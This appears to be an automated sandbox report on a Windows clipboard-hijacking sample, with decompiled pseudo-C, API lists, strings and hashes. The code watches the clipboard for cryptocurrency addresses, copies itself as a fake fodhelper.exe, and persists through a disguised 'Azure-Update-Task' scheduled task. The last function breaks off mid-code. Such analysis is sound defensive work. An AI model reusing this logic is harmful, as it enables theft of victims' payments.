C-Code - Quality: 100%

			_entry_() {
				WCHAR* _v8;
				void* _v12;
				signed int _v16;
				signed short* _v20;
				signed int _v24;
				long _v28;
				WCHAR* _t38;
				long _t40;
				signed short _t43;
				signed int _t48;
				signed int _t50;
				signed short* _t51;
				signed int _t52;
				signed int _t60;
				void* _t61;
				short _t63;
				WCHAR* _t65;
				signed short _t71;
				void* _t76;
				signed int _t78;

				E00401000(); // executed
				CreateMutexW(0, 0, L"CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG"); // executed
				if(GetLastError() == 0xb7) {
					ExitProcess(0); // executed
				}
				E00401272(); // executed
				_t76 = _v28;
				while(1) {
					_t38 = E00401FEF();
					_t63 = 0;
					_v8 = _t38;
					if(_t38 == 0) {
						goto L23;
					}
					_t3 = lstrlenW(_t38) + 1; // 0x1
					_t40 = _t3 + _t3;
					_v28 = _t40;
					_v12 = LocalAlloc(0x40, _t40);
					E00401418(_t41, _t77, _v8);
					_t65 = _v8;
					_t78 = 0;
					_v16 = _v16 & 0;
					_t43 =  *_t65 & 0x0000ffff;
					_t71 = _t43;
					if(_t43 == 0) {
						L22:
						E00401F8B(_v12, lstrlenW(_v12));
						LocalFree(_v12);
					} else {
						_v20 = _t65;
						do {
							_v24 = _t71 & 0x0000ffff;
							_t48 = _t71 & 0x0000ffff;
							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
								if(_t63 != 0) {
									 *(_t76 + _t78 * 2) = 0;
									_t63 = 0;
									E0040175F( &_v12, _t76);
									if(_t76 != 0) {
										LocalFree(_t76);
									}
									_t65 = _v8;
								}
							} else {
								_t60 = _v24 & 0x0000ffff;
								if(_t63 == 0) {
									_t61 = LocalAlloc(0x40, _v28);
									_t65 = _v8;
									_t76 = _t61;
									_t63 = _t63 + 1;
									_t78 = 0;
									_t60 =  *_v20 & 0x0000ffff;
								}
								 *(_t76 + _t78 * 2) = _t60;
								_t78 = _t78 + 1;
							}
							_t50 = _v16 + 1;
							_v16 = _t50;
							_t51 =  &(_t65[_t50]);
							_v20 = _t51;
							_t52 =  *_t51 & 0x0000ffff;
							_t71 = _t52;
						} while (_t52 != 0);
						if(_t63 != 0) {
							 *((short*)(_t76 + lstrlenW(_t76) * 2)) = 0;
							E0040175F( &_v12, _t76);
							if(_t76 != 0) {
								LocalFree(_t76);
							}
						}
						goto L22;
					}
					L23:
					Sleep(0xe1);
				}
			}

0x00402034
0x00402042
0x00402053
0x00402057
0x00402057
0x0040205d
0x00402062
0x00402065
0x00402065
0x0040206a
0x0040206c
0x00402071
0x00000000
0x00000000
0x0040207e
0x00402081
0x00402087
0x00402095
0x0040209a
0x0040209f
0x004020a2
0x004020a4
0x004020a7
0x004020aa
0x004020af
0x0040216e
0x0040217c
0x00402184
0x004020b5
0x004020b5
0x004020b8
0x004020bb
0x004020be
0x004020c4
0x0040210b
0x00402114
0x00402118
0x0040211a
0x00402121
0x00402124
0x00402124
0x0040212a
0x0040212a
0x004020df
0x004020e2
0x004020e7
0x004020ee
0x004020f4
0x004020f7
0x004020fc
0x004020fd
0x004020ff
0x004020ff
0x00402102
0x00402106
0x00402106
0x00402130
0x00402131
0x00402134
0x00402137
0x0040213a
0x0040213d
0x0040213f
0x0040214a
0x00402157
0x0040215e
0x00402165
0x00402168
0x00402168
0x00402165
0x00000000
0x0040214a
0x0040218a
0x0040218f
0x0040218f

APIs

Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
Part of subcall function 00401000: LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
Part of subcall function 00401000: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
Part of subcall function 00401000: LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
Part of subcall function 00401000: LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187

CreateMutexW.KERNELBASE(00000000,00000000,CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG), ref: 00402042
GetLastError.KERNEL32 ref: 00402048
ExitProcess.KERNEL32 ref: 00402057
lstrlenW.KERNEL32(00000000), ref: 00402078
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040208A
LocalAlloc.KERNEL32(00000040,?,?), ref: 004020EE
lstrlenW.KERNEL32(?,?), ref: 0040214D
LocalFree.KERNEL32(?), ref: 00402168
lstrlenW.KERNEL32(?,?), ref: 00402171
LocalFree.KERNEL32(?), ref: 00402184
Sleep.KERNEL32(000000E1), ref: 0040218F

Strings

CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG, xrefs: 00402039

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
String ID: CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
API String ID: 3526352376-3104312164
Opcode ID: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
Instruction ID: 7e7fe45736c42aac81fc2ce1aa47f84d3ee5633dea0ad928d306184e7dbb2170
Opcode Fuzzy Hash: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
Instruction Fuzzy Hash: DF4186749002159BCB119FA5DA88A7E77B5BF48701F10043AE742F72E0DBB89E01DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401339, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82
processmemorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401339(void* __ecx, void* __eflags) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t28;
				int _t49;
				void* _t50;
				void* _t51;

				_t49 = 0x44;
				_t51 = __ecx;
				memset( &_v92, 0, _t49);
				_v92.cb = _t49;
				memset( &_v24, 0, 0x10);
				_v8 = LocalAlloc(0x40, 0x308);
				E00402230( &_v8, L"/C /create /F /sc minute /mo 1 /tn \"");
				E00402230( &_v8, L"Azure-Update-Task");
				E00402230( &_v8, L"\" /tr \"");
				E00402230( &_v8, _t51);
				E00402230( &_v8, "\"");
				_t50 = _v8;
				_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
				if(_t28 != 0) {
					WaitForSingleObject(_v24.hProcess, 0xffffffff);
					CloseHandle(_v24);
					CloseHandle(_v24.hThread);
					if(_t50 != 0) {
						LocalFree(_t50);
					}
					return 1;
				}
				if(_t50 != 0) {
					LocalFree(_t50);
				}
				return 0;
			}

0x00401344
0x0040134d
0x0040134f
0x0040135a
0x0040135f
0x0040137a
0x00401380
0x0040138d
0x0040139a
0x004013a4
0x004013b1
0x004013b6
0x004013d1
0x004013d9
0x004013ef
0x004013fe
0x00401403
0x00401407
0x0040140a
0x0040140a
0x00000000
0x00401412
0x004013dd
0x004013e0
0x004013e0
0x00000000

APIs

memset.NTDLL ref: 0040134F
memset.NTDLL ref: 0040135F
LocalAlloc.KERNEL32(00000040,00000308), ref: 0040136F

Part of subcall function 00402230: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00402246
Part of subcall function 00402230: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00402253
Part of subcall function 00402230: LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00402264
Part of subcall function 00402230: GlobalFree.KERNEL32 ref: 00402285

CreateProcessW.KERNELBASE ref: 004013D1
LocalFree.KERNEL32(?), ref: 004013E0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
CloseHandle.KERNEL32(?), ref: 004013FE
CloseHandle.KERNEL32(?), ref: 00401403
LocalFree.KERNEL32(?), ref: 0040140A

Strings

Azure-Update-Task, xrefs: 00401385
/C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
C:\Windows\System32\schtasks.exe, xrefs: 004013CC
" /tr ", xrefs: 00401392

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$Free$AllocCloseHandlelstrlenmemset$CreateGlobalObjectProcessSingleWait
String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
API String ID: 2873265511-3368035720
Opcode ID: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
Instruction ID: d06e65cb243bbedc772da2b493071992bc36e5930b5998e92298165ae0813644
Opcode Fuzzy Hash: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
Instruction Fuzzy Hash: AC218171900108ABD710EBE0DE89EAF7B7CEB8075AF20007AB601B61E5DB745F058679

Uniqueness

Uniqueness Score: -1.00%

Function 00401339, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00401339(void* __ecx, void* __eflags) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t28;
				long _t49;
				WCHAR* _t50;
				void* _t51;

				_t49 = 0x44;
				_t51 = __ecx;
				 *0x404028( &_v92, 0, _t49);
				_v92.cb = _t49;
				 *0x404028( &_v24, 0, 0x10);
				_v8 =  *0x404010(0x40, 0x308);
				E00402230( &_v8, L"/C /create /F /sc minute /mo 1 /tn \"");
				E00402230( &_v8, L"Azure-Update-Task");
				E00402230( &_v8, L"\" /tr \"");
				E00402230( &_v8, _t51);
				E00402230( &_v8, "\"");
				_t50 = _v8;
				_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
				if(_t28 != 0) {
					WaitForSingleObject(_v24.hProcess, 0xffffffff);
					CloseHandle(_v24);
					CloseHandle(_v24.hThread);
					if(_t50 != 0) {
						 *0x404030(_t50);
					}
					return 1;
				}
				if(_t50 != 0) {
					 *0x404030(_t50);
				}
				return 0;
			}

APIs

CreateProcessW.KERNELBASE ref: 004013D1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
CloseHandle.KERNEL32(?), ref: 004013FE
CloseHandle.KERNEL32(?), ref: 00401403

Strings

/C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
C:\Windows\System32\schtasks.exe, xrefs: 004013CC
" /tr ", xrefs: 00401392
Azure-Update-Task, xrefs: 00401385

Memory Dump Source

Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWait
String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
API String ID: 2059082233-3368035720
Opcode ID: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
Instruction ID: d06e65cb243bbedc772da2b493071992bc36e5930b5998e92298165ae0813644
Opcode Fuzzy Hash: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
Instruction Fuzzy Hash: AC218171900108ABD710EBE0DE89EAF7B7CEB8075AF20007AB601B61E5DB745F058679

Uniqueness

Uniqueness Score: -1.00%

Function 00401272, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00401272() {
				short _v524;
				short _v1044;
				WCHAR* _t15;
				int _t19;
				void* _t24;

				 *0x40401c(0,  &_v1044, 0x104);
				_t15 =  &_v524;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
				if(_t15 >= 0) {
					 *0x404014( &_v524, L"\\Microsoft\\TelemetryServices");
					_t19 = PathIsDirectoryW( &_v524); // executed
					if(_t19 == 0) {
						CreateDirectoryW( &_v524, 0); // executed
					}
					 *0x404014( &_v524, L"\\fodhelper.exe");
					_t24 =  *0x404054( &_v1044,  &_v524);
					_t37 = _t24;
					if(_t24 == 0) {
						CopyFileW( &_v1044,  &_v524, 0); // executed
						E00401339( &_v524, __eflags); // executed
						ExitProcess(0xffffffff);
					} else {
						return E00401339( &_v524, _t37);
					}
				}
				return _t15;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
CreateDirectoryW.KERNELBASE(?,00000000), ref: 004012D2
CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
ExitProcess.KERNEL32 ref: 00401332

Strings

\Microsoft\TelemetryServices, xrefs: 004012A7
\fodhelper.exe, xrefs: 004012D8

Memory Dump Source

Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryPath$CopyCreateExitFileFolderProcess
String ID: \Microsoft\TelemetryServices$\fodhelper.exe
API String ID: 4082483661-1906870166
Opcode ID: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
Instruction ID: e9cc1551c9dc342d01193394a0d7173058b5a03e9f69f18b49f700f051a2f683
Opcode Fuzzy Hash: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
Instruction Fuzzy Hash: DC111FB1500229ABDB20DFA1DD4CECB7B7CAB45305F0005B1B769F20A1EA7497C48F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040202B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 40%

			_entry_() {
				signed short* _v8;
				char _v12;
				signed int _v16;
				signed short* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed short* _t38;
				intOrPtr _t40;
				signed short _t43;
				signed int _t48;
				signed int _t50;
				signed short* _t51;
				signed int _t52;
				signed int _t60;
				intOrPtr* _t61;
				short _t63;
				signed short* _t65;
				signed short _t71;
				intOrPtr* _t76;
				signed int _t78;

				E00401000(); // executed
				CreateMutexW(0, 0, L"CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG"); // executed
				if( *0x40402c() == 0xb7) {
					ExitProcess(0); // executed
				}
				E00401272(); // executed
				_t76 = _v28;
				while(1) {
					_t38 = E00401FEF();
					_t63 = 0;
					_v8 = _t38;
					if(_t38 == 0) {
						goto L23;
					}
					_t3 =  *0x404020(_t38) + 1; // 0x1
					_t40 = _t3 + _t3;
					_v28 = _t40;
					_v12 =  *0x404010(0x40, _t40);
					E00401418(_t41, _t77, _v8);
					_t65 = _v8;
					_t78 = 0;
					_v16 = _v16 & 0;
					_t43 =  *_t65 & 0x0000ffff;
					_t71 = _t43;
					if(_t43 == 0) {
						L22:
						E00401F8B(_v12,  *0x404020(_v12));
						 *0x404030(_v12);
					} else {
						_v20 = _t65;
						do {
							_v24 = _t71 & 0x0000ffff;
							_t48 = _t71 & 0x0000ffff;
							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
								if(_t63 != 0) {
									 *(_t76 + _t78 * 2) = 0;
									_t63 = 0;
									E0040175F( &_v12, _t76);
									if(_t76 != 0) {
										 *0x404030(_t76);
									}
									_t65 = _v8;
								}
							} else {
								_t60 = _v24 & 0x0000ffff;
								if(_t63 == 0) {
									_t61 =  *0x404010(0x40, _v28);
									_t65 = _v8;
									_t76 = _t61;
									_t63 = _t63 + 1;
									_t78 = 0;
									_t60 =  *_v20 & 0x0000ffff;
								}
								 *(_t76 + _t78 * 2) = _t60;
								_t78 = _t78 + 1;
							}
							_t50 = _v16 + 1;
							_v16 = _t50;
							_t51 =  &(_t65[_t50]);
							_v20 = _t51;
							_t52 =  *_t51 & 0x0000ffff;
							_t71 = _t52;
						} while (_t52 != 0);
						if(_t63 != 0) {
							 *((short*)(_t76 +  *0x404020(_t76) * 2)) = 0;
							E0040175F( &_v12, _t76);
							if(_t76 != 0) {
								 *0x404030(_t76);
							}
						}
						goto L22;
					}
					L23:
					Sleep(0xe1);
				}
			}

APIs

Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085

CreateMutexW.KERNELBASE(00000000,00000000,CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG), ref: 00402042
ExitProcess.KERNEL32 ref: 00402057
Sleep.KERNEL32(000000E1), ref: 0040218F

Strings

CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG, xrefs: 00402039

Memory Dump Source

Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CreateExitMutexProcessSleep
String ID: CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
API String ID: 2723477443-3104312164
Opcode ID: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
Instruction ID: 7e7fe45736c42aac81fc2ce1aa47f84d3ee5633dea0ad928d306184e7dbb2170
Opcode Fuzzy Hash: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
Instruction Fuzzy Hash: DF4186749002159BCB119FA5DA88A7E77B5BF48701F10043AE742F72E0DBB89E01DB58

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401F8B, Relevance: 13.5, APIs: 9, Instructions: 36
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F8B(void* __ecx, signed int __edx) {
				void* _t3;
				signed int _t6;
				void* _t13;
				void* _t16;
				int _t17;

				_t17 = 2 + __edx * 2;
				_t16 = __ecx;
				_t3 = GlobalAlloc(2, _t17);
				_t13 = _t3;
				GlobalFix(_t13);
				memcpy(_t3, _t16, _t17);
				GlobalUnWire(_t13);
				_t6 = OpenClipboard(0);
				if(_t6 == 0) {
					return _t6 | 0xffffffff;
				}
				EmptyClipboard();
				SetClipboardData(0xd, _t13);
				CloseClipboard();
				GlobalFree(_t13);
				return 0;
			}

0x00401f8e
0x00401f95
0x00401f9a
0x00401fa1
0x00401fa5
0x00401fac
0x00401fb6
0x00401fbe
0x00401fc6
0x00000000
0x00401fe8
0x00401fc8
0x00401fd1
0x00401fd7
0x00401fde
0x00000000

APIs

GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,00402181), ref: 00401F9A
GlobalFix.KERNEL32(00000000), ref: 00401FA5
memcpy.NTDLL(00000000), ref: 00401FAC
GlobalUnWire.KERNEL32(00000000), ref: 00401FB6
OpenClipboard.USER32(00000000), ref: 00401FBE
EmptyClipboard.USER32 ref: 00401FC8
SetClipboardData.USER32(0000000D,00000000), ref: 00401FD1
CloseClipboard.USER32 ref: 00401FD7
GlobalFree.KERNEL32 ref: 00401FDE

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
String ID:
API String ID: 2518647738-0
Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
Instruction ID: a4bbc7e47bcce071b4eef353dccca8ba4e9b63a906a15cfc171d8899673e5865
Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
Instruction Fuzzy Hash: 1BF0DAF6601110ABE2002BF5BE4DF5B3E6CEBC9756F010535B306F51A1CA7488048779

Uniqueness

Uniqueness Score: -1.00%

Function 00401FEF, Relevance: 7.5, APIs: 5, Instructions: 24
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401FEF() {
				void* _t3;
				void* _t7;
				void* _t9;

				_t9 = 0;
				if(OpenClipboard(0) != 0) {
					_t3 = GetClipboardData(0xd);
					_t7 = _t3;
					if(_t7 != 0) {
						GlobalFix(_t7);
						_t9 = _t3;
						if(_t9 != 0) {
							GlobalUnWire(_t7);
						}
					}
					CloseClipboard();
				}
				return _t9;
			}

0x00401ff0
0x00401ffb
0x00402000
0x00402006
0x0040200a
0x0040200d
0x00402013
0x00402017
0x0040201a
0x0040201a
0x00402017
0x00402020
0x00402026
0x0040202a

APIs

OpenClipboard.USER32(00000000), ref: 00401FF3
GetClipboardData.USER32(0000000D), ref: 00402000
GlobalFix.KERNEL32(00000000), ref: 0040200D
GlobalUnWire.KERNEL32(00000000), ref: 0040201A
CloseClipboard.USER32 ref: 00402020

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataOpenWire
String ID:
API String ID: 1198520892-0
Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
Instruction ID: 411f3c792f7164cc8364f065ae2bfd11b7a554dc62cab6a226cdce1d1bfb6340
Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
Instruction Fuzzy Hash: 9BE0867210172197C23227647E0CB6FAA28DFC5B52B060037FB01F22A0CB78CC05C5AC

Uniqueness

Uniqueness Score: -1.00%

Function 00401542, Relevance: 9.1, APIs: 6, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401542(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t12;
				short _t13;
				WCHAR* _t14;
				WCHAR* _t15;

				_t14 = __ecx;
				if(lstrlenW(__ecx) == 0x5f || lstrlenW(_t14) == 0x6a) {
					_t12 = 0x34;
					if( *_t14 != _t12) {
						goto L20;
					} else {
						_t4 = _t14[1] & 0x0000ffff;
						_t13 = 0x30;
						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t13 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == _t12 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
							_t15 =  &(_t14[2]);
							if(StrChrW(_t15, _t13) != 0 || StrChrW(_t15, 0x4f) != 0 || StrChrW(_t15, 0x49) != 0) {
								goto L20;
							} else {
								_t8 = StrChrW(_t15, 0x6c);
								if(_t8 != 0) {
									goto L20;
								} else {
									return  &(_t8[0]);
								}
							}
						} else {
							goto L20;
						}
					}
				} else {
					L20:
					return 0;
				}
			}

0x00401543
0x0040154f
0x00401563
0x00401567
0x00000000
0x00401569
0x00401569
0x0040156f
0x00401573
0x004015ad
0x004015b9
0x00000000
0x004015d5
0x004015d8
0x004015e0
0x00000000
0x004015e2
0x004015e4
0x004015e4
0x004015e0
0x00000000
0x00000000
0x00000000
0x00401573
0x004015e5
0x004015e5
0x004015e8
0x004015e8

APIs

lstrlenW.KERNEL32(?,?,00401AF2,?,00402163), ref: 00401546
lstrlenW.KERNEL32(?,?,00402163), ref: 00401552
StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 004015B1
StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 004015BE
StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 004015CB
StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 004015D8

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
Instruction ID: 6568eeaef115c58ffa2f60ffa8eb15a6e5f32d2d88c572dda17d6d64263e7df9
Opcode Fuzzy Hash: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
Instruction Fuzzy Hash: 9711A5A9D82110B6DB391A686C8CB7F22945FC27547584437EA03FE2F0F23CCE82558D

Uniqueness

Uniqueness Score: -1.00%

Function 00401684, Relevance: 7.6, APIs: 5, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401684(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;

				_t12 = __ecx;
				_t11 = 0x44;
				if( *__ecx != _t11 || lstrlenW(__ecx) != 0x22) {
					L31:
					return 0;
				} else {
					_t4 =  *(_t12 + 2) & 0x0000ffff;
					if(_t4 == 0x41 || _t4 == 0x42 || _t4 == 0x43 || _t4 == _t11 || _t4 == 0x45 || _t4 == 0x46 || _t4 == 0x47 || _t4 == 0x48 || _t4 == 0x4a || _t4 == 0x4b || _t4 == 0x4c || _t4 == 0x4d || _t4 == 0x4e || _t4 == 0x50 || _t4 == 0x51 || _t4 == 0x52 || _t4 == 0x53 || _t4 == 0x54 || _t4 == 0x55 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
						_t13 = _t12 + 4;
						if(StrChrW(_t13, 0x30) != 0 || StrChrW(_t13, 0x4f) != 0 || StrChrW(_t13, 0x49) != 0) {
							goto L31;
						} else {
							_t8 = StrChrW(_t13, 0x6c);
							if(_t8 != 0) {
								goto L31;
							}
							return  &(_t8[0]);
						}
					} else {
						goto L31;
					}
				}
			}

0x00401686
0x0040168a
0x0040168e
0x0040175a
0x00000000
0x004016a4
0x004016a4
0x004016ab
0x00401722
0x0040172e
0x00000000
0x0040174a
0x0040174d
0x00401755
0x00000000
0x00000000
0x00000000
0x00401757
0x00000000
0x00000000
0x00000000
0x004016ab

APIs

lstrlenW.KERNEL32(?,?,?,00401B56,?,00402163), ref: 00401695
StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 00401726
StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 00401733
StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 00401740
StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 0040174D

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
Instruction ID: 9b70e747a6d832c5252a26d5990cd4b89b60fd6c348497c2eedcdf83e6538b30
Opcode Fuzzy Hash: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
Instruction Fuzzy Hash: EE1193B1A4019A55DB382A3858C867F2AD45B52BD1B284937F206FB3F0D2BCCDC3516E

Uniqueness

Uniqueness Score: -1.00%

Function 004015E9, Relevance: 7.6, APIs: 5, Instructions: 64
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015E9(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t11;
				short _t12;
				intOrPtr* _t13;
				WCHAR* _t14;

				_t13 = __ecx;
				if(lstrlenW(__ecx) != 0x5f) {
					L19:
					return 0;
				} else {
					_t11 = 0x38;
					if( *_t13 != _t11) {
						goto L19;
					} else {
						_t4 =  *(_t13 + 2) & 0x0000ffff;
						_t12 = 0x30;
